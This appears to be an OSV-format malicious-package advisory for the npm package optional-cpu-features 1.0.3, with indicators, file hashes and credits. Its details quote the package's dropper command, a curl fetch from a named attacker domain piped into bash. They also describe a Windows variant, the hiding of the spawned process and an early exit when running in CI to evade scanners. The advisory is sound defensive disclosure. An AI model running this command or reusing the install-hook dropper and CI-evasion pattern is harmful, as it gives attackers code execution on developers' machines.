{"id":"MAL-2026-5642","summary":"Malicious code in optional-cpu-features (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4dbbb7dd9c604ef3e5782d477d4db7c04c50f7906b19af03e63a540e0a44166e)\nOn `npm install`, both the `install` and `postinstall` lifecycle scripts run `node install.js`, which requires `lib/sync.js`. That file hardcodes `BASE = \"https://api.aavcareer.ink\"` and spawns a detached, stdio-suppressed shell that runs `curl -ks ${BASE}/upd_m -o /var/tmp/upd_m && bash /var/tmp/upd_m` on Unix (or fetches `/upd_w` to `%TEMP%\\upd_w.cmd` and executes it on Windows). The fetch disables TLS certificate verification (`curl -ks`) and the spawn is detached + unref'd to hide from the install log. `install.js` early-exits with `process.exit(0)` when `process.env.CI` is `\"true\"` or `\"1\"`, so CI scanners and sandboxes see a no-op while real developer and build machines execute the remote payload. The package name and the package.json description (\"Optional native CPU feature probe for toolchain compatibility (install is a no-op when bindings are unavailable)\") advertise a CPU/SIMD feature probe, but no CPU detection code exists anywhere in the package — the cover story exists to encourage monorepos to add this as an `optionalDependencies` entry that tolerates apparent failure while the dropper has already succeeded silently. The attacker fully controls the bytes that run as the installing user on every non-CI machine.\n","modified":"2026-06-11T13:46:34.615144976Z","published":"2026-06-11T13:12:23Z","database_specific":{"malicious-packages-origins":[{"sha256":"4dbbb7dd9c604ef3e5782d477d4db7c04c50f7906b19af03e63a540e0a44166e","import_time":"2026-06-11T13:27:20.967952595Z","id":"IN-MAL-2026-005737","versions":["1.0.3"],"source":"amazon-inspector","modified_time":"2026-06-11T13:12:23Z"},{"sha256":"83f5bd807e50ab6d644f7770c01e7da5560da2b603106cb18b08a12d92b6c441","import_time":"2026-06-11T13:27:21.015594968Z","modified_time":"2026-06-11T13:12:23Z","versions":["1.0.3"],"source":"amazon-inspector","id":"IN-MAL-2026-005738"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/optional-cpu-features/v/1.0.3"}],"affected":[{"package":{"name":"optional-cpu-features","ecosystem":"npm","purl":"pkg:npm/optional-cpu-features"},"versions":["1.0.3"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/optional-cpu-features/MAL-2026-5642.json","indicators":{"domains":["api.aavcareer.ink"],"package_integrity":[{"hashes":{"sha512_sri":"sha512-DYowjOM/v+7T3sG83kyr2thwuAfPMGiumsCAFFoBHjDs7zF+ivYb3Q0jxesdJY4gE7d8yz5CTbWT/6rekZg9lQ==","sha1":"965715d1acc7c01b58af3910e5c4878aaff058e6"},"filename":"optional-cpu-features-1.0.3.tgz"}],"evidence_files":[{"sha256":"164782df220451c8a7a2e457851b273c918af12f6b3fef31d81c8d3acb1991ca","path":"lib/sync.js","tlsh":"85f09e16436f053562e148d1c7d4f81e64a7010cb614a533c98c59559b2fb0d5733094"},{"sha256":"de2781f645dffdd73f09748792cac8eb692e091dee3692bf10eb83ac0978cbf2","path":"install.js","tlsh":"83c01299e5dd8c5412d017c5301d4107d4f9d02406452472396cb5d9bb10a70539551f"},{"sha256":"9ae1f5f041a6a506a6eb1c08dfd6d163b5ad22a2d796f1c51c3feb927892d091","path":"package.json","tlsh":"ede0aba0d8101a2338c90be90c17514822310a2708507e102387521c17ef22698bf9af"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}